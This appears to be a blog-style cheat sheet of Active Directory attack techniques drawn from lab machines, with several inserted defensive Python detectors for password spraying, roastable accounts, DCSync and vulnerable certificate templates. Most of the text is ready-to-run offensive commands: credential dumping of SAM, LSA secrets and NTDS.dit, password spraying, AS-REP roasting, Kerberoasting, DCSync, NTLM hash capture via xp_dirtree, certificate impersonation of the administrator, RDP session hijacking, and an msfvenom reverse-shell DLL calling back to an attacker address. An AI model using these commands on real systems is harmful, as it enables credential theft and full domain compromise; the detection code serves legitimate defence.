Active Directory Tools & attacks

This document is a work in progress in which I'm compiling a variety of techniques for enumerating and exploiting Active Directory environments. It will be updated over time with additional steps and insights as I continue to explore and refine the methodology.

ENUMERATION TECHNIQUES


ENUMERATING SMB


SMB (Server Message Block) is a network file sharing protocol used in Windows environments that allows applications to read and write to files, request services from server programs, and communicate with other devices on a network. It’s commonly used for sharing files and printers between computers within a local network.

Crackmapexec for smb


CrackMapExec (CME) for SMB is a tool used by penetration testers to automate post-exploitation tasks on Windows networks via the SMB protocol. It allows users to quickly enumerate SMB shares, perform lateral movement, dump hashes, execute remote commands, and check SMB authentication across multiple systems. CME is commonly used for internal network exploitation and vulnerability assessment in Windows environments.

crackmapexec smb 10.10.10.175 -u '' -p '' # Authenticate as anonymous
crackmapexec smb 10.10.10.175 -u 'guest' -p 'guest' # Authenticate as guest
crackmapexec smb 10.10.10.175 -u 'valid_creds' -p 'valid_creds' # Authenticate with valid credentials
crackmapexec smb 10.10.10.177 -u <username> -p <password> -x '<command>' # Execute commands
crackmapexec smb 10.129.202.137 --local-auth -u whare -p 'password!' --lsa # Dump LSA secrets if we have permission
crackmapexec smb 10.129.202.137 --local-auth -u whare -p 'password!' --sam # Dump the SAM if we have permission

Smbclient


Smbclient is a command-line tool used to access and interact with shared files and printers over the SMB/CIFS protocol. It is commonly used in Linux and Unix-based systems to connect to Windows-based file shares.

smbclient //10.10.10.182/Data -U r.thompson # Connect to a specific share
smbclient -L <hostname> -U <username> # List shared resources on a server
smbclient //<hostname>/<share> -U <username> -c 'put <localfile> <remotefile>' # Upload a file
smbclient //<hostname>/<share> -U <username> -c 'get <remotefile> <localfile>' # Download a file from the server
smbclient //10.10.10.182/Audit$ -U s.smith # With the following commands you can download all available files from a share
smb: \> mask ""
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget *

Smbmap

smbmap -H 10.10.10.192 -u audit2020 -p 'wharep@ssword2025'

ENUMERATING RPC


RPC is a protocol used by programs to request services or perform tasks on a remote server or computer. It allows a program to execute code on another machine as if it were local, facilitating distributed computing. It’s widely used for client-server communication and allows seamless interaction between systems over a network.

Rpcclient


Rpcclient is a command-line tool used to interact with the Remote Procedure Call (RPC) service on Windows machines, typically via SMB. It allows users to perform various tasks such as enumerating users, groups, shares, and more, by sending requests to the Windows RPC server.

rpcclient -U "" -N 10.10.10.169
rpcclient $> enumdomusers
rpcclient $> querydispinfo
# After dumping the raw output we can use the following command to extract just the usernames
grep -oP '(?<=user:\[)[^\]]+' raw_names.txt > users.txt

ENUMERATING LDAP


LDAP (Lightweight Directory Access Protocol) is a protocol used to access and manage directory services over a network. It is commonly used for querying and modifying data in directory services such as Microsoft Active Directory (AD) or OpenLDAP.

Ldapsearch


Ldapsearch is a command-line tool used to query and search data from an LDAP (Lightweight Directory Access Protocol) server, such as Active Directory or OpenLDAP. It allows you to search for specific objects (like users, groups, or computers) in the directory and retrieve their attributes. There's a cheatsheet for applying different filters.

ldapsearch -x -H ldap://10.10.10.182 -s base -b "" namingcontexts # Get the naming contexts of the domain
ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub > ldap_dump.txt # Dump all the information
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" "(objectClass=person)" > dumping_users.txt # Apply a filter to the dump

Crackmapexec for ldap


CrackMapExec (CME) also supports LDAP (Lightweight Directory Access Protocol), which allows you to interact with and enumerate data in directory services like Active Directory. With CME, you can query and interact with LDAP servers, perform user enumeration, and execute commands on the directory server.

crackmapexec ldap <hostname> -u <username> -p <password> --users # Enumerate users and groups
crackmapexec ldap <hostname> -u <username> -p <password> --domains # Enumerate domains
crackmapexec ldap <hostname> -u <username> -p <password> --search '(&(objectClass=user)(sAMAccountName=*administrator*))' # Search for specific attributes

Netexec for ldap


Netexec is a post-exploitation tool used to execute commands on remote machines via various network protocols, such as SMB, LDAP, and ADCS. It allows attackers to interact with Active Directory and related services, automate tasks, and perform enumeration or exploitation of vulnerable configurations in the network.

netexec ldap <target-ip> -u <user> -p <password> --module enumdc # Enumerate Domain Controllers
netexec ldap <target-ip> -u <user> -p <password> --module user-desc # Search user description fields
netexec ldap <target-ip> -u <user> -p <password> --module adcs # Check for misconfigurations in ADCS
netexec ldap <target-ip> -u <user> -p <password> --module ldap-checker # Check whether LDAP signing and channel binding are enforced

Netexec for smb


netexec smb 10.129.202.85 -u whare -p 's3cur3p@ssw0rd!' --ntds # Dump NTDS.dit
netexec smb 10.129.202.85 -u whare -p 's3cur3p@ssw0rd!' --lsa # Dump LSA secrets
netexec smb 10.129.202.85 -u whare -p 's3cur3p@ssw0rd!' --sam # Dump the SAM
netexec smb 10.129.202.85 -u whare -p 's3cur3p@ssw0rd!' -X 'whoami -all' # Execute PowerShell commands
netexec smb 10.129.43.219 -u names.list -p pws.list --local-auth # Brute-force a local account

Netexec for winrm


netexec winrm 10.129.202.85 -u names_list.txt -p password_list.txt

ENUMERATING RDP


Metasploit for rdp


use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <ip_range>
run

Hijack RDP session & disable restricted admin mode

sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0

ENUMERATING TLS


TLS encrypts the communication between client and server. On a domain controller it is exposed on port 3269 for Global Catalog queries over LDAPS. Enumerating it is worthwhile because the server certificate may reveal valuable information about the domain, its certificates and potential attack vectors, even though the channel itself is encrypted.

openssl s_client -showcerts -connect 10.10.11.202:3269 | openssl x509 -noout -text

ENUMERATING MSSQL

MSSQL (Microsoft SQL Server) is a relational database management system (RDBMS) developed by Microsoft. It is widely used in enterprise environments to store and manage large amounts of data, supporting complex queries, transactions, and data integrity.

Impacket-mssqlclient


Impacket-mssqlclient is a tool from the Impacket suite, which provides scripts and utilities to interact with various network protocols in Windows environments. mssqlclient allows us to connect to an MSSQL server using the obtained credentials, enabling actions like executing SQL queries, exploiting SQL injection vulnerabilities, or accessing sensitive data stored in the database.

impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@dc.sequel.htb

VULNERABILITIES


Password spraying


Password spraying is a brute-force attack method where an attacker attempts to log in to multiple accounts using the same common password (e.g., “Welcome123!”). Unlike traditional brute force, which targets one account with many passwords, password spraying avoids account lockouts by testing a single password across many different accounts.

crackmapexec smb 10.10.10.169 -u users.txt -p password.txt --continue-on-success
netexec ldap <target-ip> -u users.txt -p password.txt --continue-on-success
netexec smb <target-ip> -u users.txt -p password.txt --continue-on-success
netexec winrm <target-ip> -u users.txt -p password.txt --continue-on-success
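As an added example (not from the original post), the defender-side view of the commands above: a spray shows up in the domain controller's failed-logon events (ID 4625) as one source address failing against many distinct accounts in a short window, which is what this check looks for. The event records are constructed and simplified; their field layout is an assumption of this example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records shaped like Security event 4625 (failed logon):
# timestamp, target account, source address, NTSTATUS sub-status.
# 0xC000006A = wrong password, 0xC0000064 = account does not exist.
SAMPLE_EVENTS = [
    ("2025-03-01T10:00:01", "r.thompson", "10.10.14.9", "0xC000006A"),
    ("2025-03-01T10:00:02", "s.smith", "10.10.14.9", "0xC000006A"),
    ("2025-03-01T10:00:02", "j.doe", "10.10.14.9", "0xC0000064"),
    ("2025-03-01T10:00:03", "svc_backup", "10.10.14.9", "0xC000006A"),
    ("2025-03-01T10:00:04", "a.admin", "10.10.14.9", "0xC000006A"),
    ("2025-03-01T10:00:05", "p.rosa", "10.10.14.9", "0xC000006A"),
    # One user mistyping their own password: same number of failures,
    # but one account from one source. This must not be reported.
    ("2025-03-01T10:02:00", "m.lee", "10.10.10.50", "0xC000006A"),
    ("2025-03-01T10:02:05", "m.lee", "10.10.10.50", "0xC000006A"),
    ("2025-03-01T10:02:09", "m.lee", "10.10.10.50", "0xC000006A"),
    ("2025-03-01T10:02:15", "m.lee", "10.10.10.50", "0xC000006A"),
    ("2025-03-01T10:02:20", "m.lee", "10.10.10.50", "0xC000006A"),
    ("2025-03-01T10:02:31", "m.lee", "10.10.10.50", "0xC000006A"),
]


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Map each source address to the distinct accounts it failed against,
    for sources that hit at least `min_accounts` accounts inside one window.
    Raw failure counts are deliberately ignored: many failures against a
    single account is a lockout or a typo, not a spray."""
    by_source = defaultdict(list)
    for ts, user, src, _status in events:
        by_source[src].append((datetime.fromisoformat(ts), user.lower()))
    hits = {}
    for src, items in by_source.items():
        items.sort()
        best, lo = set(), 0
        for hi in range(len(items)):
            # Advance the left edge until items[lo..hi] fit in the window.
            while items[hi][0] - items[lo][0] > window:
                lo += 1
            accounts = {u for _, u in items[lo:hi + 1]}
            if len(accounts) >= min_accounts and len(accounts) > len(best):
                best = accounts
        if best:
            hits[src] = sorted(best)
    return hits


def unknown_account_ratio(events, src):
    """Fraction of a source's failures that hit non-existent accounts. A high
    value means usernames are still being guessed (the username-anarchy or
    kerbrute stage below) rather than known accounts being sprayed."""
    mine = [e for e in events if e[2] == src]
    return sum(e[3] == "0xC0000064" for e in mine) / len(mine) if mine else 0.0
```

Tuning `min_accounts` and `window` to the domain's lockout policy matters: a spray is paced to stay under the lockout threshold, so the window should be at least as long as the observation window of that policy.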

Kerberos pre-authentication vulnerability


Username-anarchy


Username-anarchy is a tool commonly used in Active Directory enumeration during security assessments. It is designed to find usernames based on common naming conventions used within organizations. The tool tries to identify likely usernames by leveraging patterns such as the combination of first names, last names, initials, and common organizational naming formats.

1
./username-anarchy --input-file /home/whare/hackthebox/maquinas/saune/users.txt --select-format first,flast,first.last,firstl > test_users.txt

AS-REP attack


An AS-REP attack (AS-REP Roasting) exploits the Kerberos authentication flow in Active Directory environments, targeting user accounts that have Kerberos pre-authentication disabled. For such an account the domain controller answers an AS-REQ with an AS-REP (Authentication Service Response) whose encrypted part is derived from the user's password, without first proving the requester knows that password. The response can therefore be captured and cracked offline to reveal the user's password, making this attack particularly effective against accounts without strong protections in place.

Target: User accounts with Kerberos pre-authentication disabled.

impacket-GetNPUsers.py is an Impacket script used for AS-REP Roasting attacks in Active Directory. It retrieves users with Kerberos pre-authentication disabled, allowing attackers to capture and crack password hashes offline.

# COMMANDS
impacket-GetNPUsers.py -no-pass -usersfile test_users.txt EGOTISTICAL-BANK.local/
impacket-GetNPUsers.py -usersfile users.txt -domain DOMAIN.local -no-pass

Kerbrute is a tool for performing brute-force attacks against Kerberos authentication. It can be used to enumerate valid usernames and perform AS-REP Roasting attacks to obtain password hashes from users with Kerberos pre-authentication disabled.

# COMMANDS
kerbrute userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL usernames.txt
kerbrute userenum -d DOMAIN -i users.txt

Kerberoasting


Kerberoasting targets service accounts in Active Directory environments. In this attack, an attacker requests Service Tickets (TGS) for service accounts with a registered Service Principal Name (SPN). These tickets are encrypted with the service account’s password hash, and once obtained, they can be cracked offline to reveal the plaintext password of the service account. This provides attackers with access to services and potential privilege escalation.

Target: Service accounts, which typically have weak or predictable passwords.

impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
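Audit-side counterpart to the AS-REP Roasting and Kerberoasting sections, added here and not part of the original post: the same attributes GetNPUsers and GetUserSPNs rely on (userAccountControl, servicePrincipalName, msDS-SupportedEncryptionTypes, pwdLastSet) can be read from an LDAP dump to list the exposed accounts before an attacker does. The account records are constructed; the field shape and the 365-day password-age threshold are assumptions of this example.

```python
from datetime import datetime

# userAccountControl bits (Windows-defined values).
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_REQ_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"
RC4_HMAC, AES128, AES256 = 0x04, 0x08, 0x10  # msDS-SupportedEncryptionTypes bits
# Constructed sample shaped like the attributes an ldapsearch dump returns;
# pwdLastSet is an ISO date here instead of the raw FILETIME for readability.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "fsmith", "userAccountControl": 0x410200,  # pre-auth off
     "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": 0,
     "pwdLastSet": "2019-01-10"},
    {"sAMAccountName": "svc_tgs", "userAccountControl": 0x10200,
     "servicePrincipalName": ["active/CIFS:445"],
     "msDS-SupportedEncryptionTypes": 0, "pwdLastSet": "2018-07-18"},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/dc.sequel.htb:1433"],
     "msDS-SupportedEncryptionTypes": AES128 | AES256, "pwdLastSet": "2025-01-05"},
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000,  # machine account
     "servicePrincipalName": ["ldap/dc01"], "msDS-SupportedEncryptionTypes": AES256,
     "pwdLastSet": "2025-02-20"},
]


def asrep_roastable(accounts):
    """Enabled accounts with DONT_REQ_PREAUTH set: exactly the set the
    GetNPUsers/kerbrute commands above would harvest. Clearing the flag
    (Set-ADAccountControl -DoesNotRequirePreAuth $false) closes the gap."""
    return sorted(a["sAMAccountName"] for a in accounts
                  if a["userAccountControl"] & DONT_REQ_PREAUTH
                  and not a["userAccountControl"] & ACCOUNTDISABLE)


def kerberoast_exposure(accounts, now=datetime(2025, 3, 1), max_age_days=365):
    """Enabled user accounts carrying an SPN, each with the reasons an offline
    crack of their service ticket would be realistic. Machine accounts are
    skipped: their passwords are long, random and rotated automatically."""
    exposure = {}
    for a in accounts:
        uac = a["userAccountControl"]
        if not a["servicePrincipalName"] or uac & ACCOUNTDISABLE or not uac & NORMAL_ACCOUNT:
            continue
        reasons = []
        enc = a["msDS-SupportedEncryptionTypes"]
        # 0 means the attribute is unset and the domain default applies, which
        # has historically included RC4; RC4 tickets crack far faster than AES.
        if enc == 0 or enc & RC4_HMAC:
            reasons.append("rc4-allowed")
        age = (now - datetime.fromisoformat(a["pwdLastSet"])).days
        if age > max_age_days:
            reasons.append(f"password-age-{age}d")
        exposure[a["sAMAccountName"]] = reasons
    return exposure
```

Service accounts that show up with `rc4-allowed` and an old password are the ones to move to a group Managed Service Account or at least to a long rotated password with AES-only encryption types.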

DC-SYNC


DCSync attack is a method used to simulate the behavior of a Domain Controller (DC) in order to retrieve password hashes of domain accounts from Active Directory. This attack exploits the replication protocol used by domain controllers to synchronize directory data. By performing a DCSync attack, an attacker can request the password hashes (or even clear-text passwords, if applicable) for specific accounts without needing direct access to the DC.

You will need one of the following rights, which BloodHound usually shows:

  • DS-REPLICATION-GET-CHANGES: Allows obtaining information about changes in the directory.
  • DS-REPLICATION-GET-CHANGES-ALL: Allows obtaining all replication changes, including encrypted passwords.
  • Elevated Permissions: Members of Domain Admins or Enterprise Admins typically have these permissions.
./secretsdump.py egotistical-bank/svc_loanmgr@10.10.10.175 # Dump credentials (if we have access to them)
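Added example, not from the original post: detecting the rights listed above being exercised. A DCSync makes the domain controller log event 4662 carrying the replication control-access GUIDs, and the only legitimate callers are other domain controllers (plus known sync products that belong on an allow-list). The records and the DC account list below are constructed; the field names are assumptions of this example.

```python
import re

# Control-access-right GUIDs that appear in event 4662 "Properties" when one
# of the replication rights listed above is exercised (Windows-defined values).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # 4662 AccessMask for "control access" operations
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Properties string of a replication request against the domain object
# (the last GUID is the domainDNS object class). Constructed for this example.
DCSYNC_PROPS = ("{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
                "{19195a5b-6da0-11d0-afd3-00c04fd930c9}")

# Constructed, simplified 4662 records as a SIEM would hold them.
SAMPLE_4662 = [
    {"subject": "DC02$", "access_mask": 0x100, "properties": DCSYNC_PROPS},
    {"subject": "svc_loanmgr", "access_mask": 0x100, "properties": DCSYNC_PROPS},
    # Ordinary read of a user object: not a control-access operation.
    {"subject": "j.doe", "access_mask": 0x10,
     "properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights(properties):
    """Names of the replication rights present in a 4662 Properties string."""
    return sorted(REPL_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
                  if g.lower() in REPL_RIGHTS)


def suspicious_dcsync(events, dc_accounts):
    """{subject: rights} for control-access events that exercise replication
    rights from anything other than a domain controller's machine account.
    Every hit is either a replication product (e.g. Azure AD Connect) that
    belongs on an allow-list, or a DCSync in progress."""
    findings = {}
    for e in events:
        if e["access_mask"] != CONTROL_ACCESS:
            continue
        rights = replication_rights(e["properties"])
        if rights and e["subject"] not in dc_accounts:
            findings[e["subject"]] = rights
    return findings
```

Auditing for 4662 must be enabled on the domain controllers (Directory Service Access) and the domain object needs a SACL entry for these rights, otherwise the event is never written.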

Man in the middle


A Man-in-the-Middle (MITM) attack in the context of Active Directory (AD) involves intercepting and potentially altering communication between a client (e.g., a user or service) and a domain controller (DC). This can occur when an attacker is positioned between the client and DC, allowing them to capture authentication traffic, modify requests, or inject malicious data.

MITM with mssql


Once we are inside MSSQL we can try to force a connection to our SMB server in order to capture its NTLMv2 hash.

impacket-smbserver share /tmp/share -ip 10.10.14.9 -smb2support # Create your SMB server
EXEC xp_dirtree '\\10.10.14.9\share', 1, 1 -- Make MSSQL connect to the SMB server

Active Directory Certificate Services (ADCS)


This vulnerability arises when the Active Directory Certificate Services (ADCS) are improperly configured. In such cases, attackers can potentially request and obtain certificates from the enterprise CA without proper authorization. These misconfigurations can allow an attacker to enroll for certificates that grant elevated privileges or enable impersonation of legitimate users. By exploiting this weakness, an attacker could escalate privileges or move laterally within the network.

Certify.exe


With Certify.exe, we can test whether the victim machine's ADCS setup is susceptible to unauthorized certificate enrollment and assess the associated risks.

.\Certify.exe find /vulnerable /currentuser # Check whether any template is vulnerable
.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator # Request a certificate with an alternate subject name
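Added example, not part of the original post or of Certify: the conditions under which a request with /altname like the one above succeeds (the ESC1 pattern that Certify's /vulnerable check reports) can be audited from the template attributes themselves, which is what a defender should do before an attacker runs the find. The template values here are constructed; the UserAuthentication name comes from the post but its settings are assumed, not taken from that environment.

```python
# Template attribute values (Windows PKI schema constants).
ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag
PEND_ALL_REQUESTS = 0x2           # msPKI-Enrollment-Flag: CA manager approval
# EKUs that let a certificate authenticate a user (Kerberos PKINIT / Schannel).
LOGON_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "2.5.29.37.0": "Any Purpose",
}
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

# Constructed templates; only the attributes the ESC1 checks need are kept.
# "UserAuthentication" is the template name used in the post; the values
# assigned to it here are assumed for the example.
SAMPLE_TEMPLATES = [
    {"name": "UserAuthentication", "name_flag": ENROLLEE_SUPPLIES_SUBJECT,
     "enrollment_flag": 0, "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"],
     "enroll": ["Domain Users"]},
    {"name": "User", "name_flag": 0, "enrollment_flag": 0, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},  # SAN built from AD
    {"name": "WebServer", "name_flag": ENROLLEE_SUPPLIES_SUBJECT, "enrollment_flag": 0,
     "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.1"], "enroll": ["Domain Computers"]},
    {"name": "AdminApproved", "name_flag": ENROLLEE_SUPPLIES_SUBJECT,
     "enrollment_flag": PEND_ALL_REQUESTS, "ra_signatures": 0,
     "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
]


def esc1_checks(t):
    """Each ESC1 condition for one template; all must hold to be exploitable."""
    return {
        "enrollee-supplies-subject": bool(t["name_flag"] & ENROLLEE_SUPPLIES_SUBJECT),
        "no-manager-approval": not t["enrollment_flag"] & PEND_ALL_REQUESTS,
        "no-authorized-signatures": t["ra_signatures"] == 0,
        # An empty EKU list means the certificate is valid for any purpose.
        "logon-eku": not t["ekus"] or any(e in LOGON_EKUS for e in t["ekus"]),
        "low-priv-enrollment": bool(LOW_PRIV & set(t["enroll"])),
    }


def esc1_findings(templates):
    """Map vulnerable template name -> the condition names that made it so."""
    return {t["name"]: sorted(esc1_checks(t)) for t in templates
            if all(esc1_checks(t).values())}


def failed_conditions(t):
    """Conditions that do NOT hold, i.e. what currently protects the template."""
    return sorted(k for k, ok in esc1_checks(t).items() if not ok)
```

Any single failed condition is enough to break the chain, so the cheapest fix for a flagged template is usually to clear the enrollee-supplies-subject flag or to require manager approval.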

Rubeus.exe


Rubeus.exe is a powerful tool for interacting with Kerberos tickets in Windows environments. Here we use it to request a Ticket Granting Ticket (TGT) with the certificate we obtained; in this case it also returns the account's NTLM hash.

.\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /show /nowrap

ABUSE OF PRIVILEGES


Enumerating privileges


Common commands


whoami -all
whoami -groups

Bloodhound for enumerating privileges


BloodHound is a tool for Active Directory auditing that helps map trust relationships, permissions, and privilege escalation paths within a domain. It visually identifies attack vectors by showing how an attacker could escalate privileges or move laterally within a network.

If we can't access via WinRM:

bloodhound-python -c All -u P.Rosa -p 'Rosaisbest123' -d vintage.htb -ns 10.10.11.45

If we can access via WinRM, use SharpHound:

SharpHound for enumerating privileges


SharpHound is the data collection tool used by BloodHound. It scans the Active Directory environment to gather information about users, groups, permissions, and trust relationships. The data collected is then analyzed by BloodHound.

Why we use SharpHound:
We use SharpHound because it performs a more thorough scan of the domain from within the network. It reveals detailed relationships and permissions that may not be accessible remotely, providing critical information for privilege escalation.

DISCLAIMER: If you are using BloodHound installed from Kali’s APT repository, you will need to run SharpHound v1.1.0. Otherwise, your data will not load properly.

Privileged AD Group Abuse


AD-Recycle Bin


The AD Recycle Bin is a feature in Active Directory that allows the recovery of deleted objects, such as users, groups, or computers, without requiring backups. Being part of this group, we can potentially enumerate and extract information from deleted objects in the domain.

Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects # Filter for deleted objects
Get-ADObject -Filter 'SAMAccountName -eq "User"' -IncludeDeletedObjects -Properties * # Filter for users
Get-ADObject -ldapfilter "(&(ObjectClass=user)(DisplayName=TempAdmin)(isDeleted=TRUE))" -IncludeDeletedObjects -Properties *
Restore-ADObject -Identity <ObjectGUID> # Restore objects

Dns-Admins


DnsAdmins group consists of users who have special permissions to manage and configure DNS settings on a Windows machine. Members of this group typically have the ability to create, modify, and delete DNS records in Active Directory-integrated zones. By default, this group does not have permission to start or stop the DNS service, but administrators can assign additional privileges to members, which may include the ability to control the DNS service.

We create our malicious plugin using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f dll -o whare.dll

Next steps explained in the Resolute writeup

LAPS_Readers


LAPS_Readers is a built-in group in Active Directory, specifically for Local Administrator Password Solution (LAPS). Members of this group have read-only access to the local administrator passwords of managed machines in the domain. These passwords are automatically generated and stored securely in Active Directory by LAPS.

In short, LAPS_Readers allows members to view the local administrator passwords, but not to modify or manage them.

Get-ADComputer -Filter * | Select-Object Name
Get-ADComputer -Identity "DC01" -Properties ms-Mcs-AdmPwd

Backup Operators


The Backup Operators group is a built-in group in Windows that grants its members the ability to back up and restore files on the system, even if they do not have direct access to those files. Members of this group have elevated privileges, but they are often overlooked when it comes to privilege escalation, as they can access sensitive files such as the NTDS.dit file, which contains the Active Directory database, including user credentials and hashes.

Our goal is to leverage our membership in the Backup Operators group to try to copy the NTDS.dit file. Once we have a copy of the file, we can extract and crack the hashes stored inside it to potentially gain access to other user accounts or escalate our privileges further.

Step-by-step guide here

netrunner

This post is licensed under CC BY 4.0 by the author.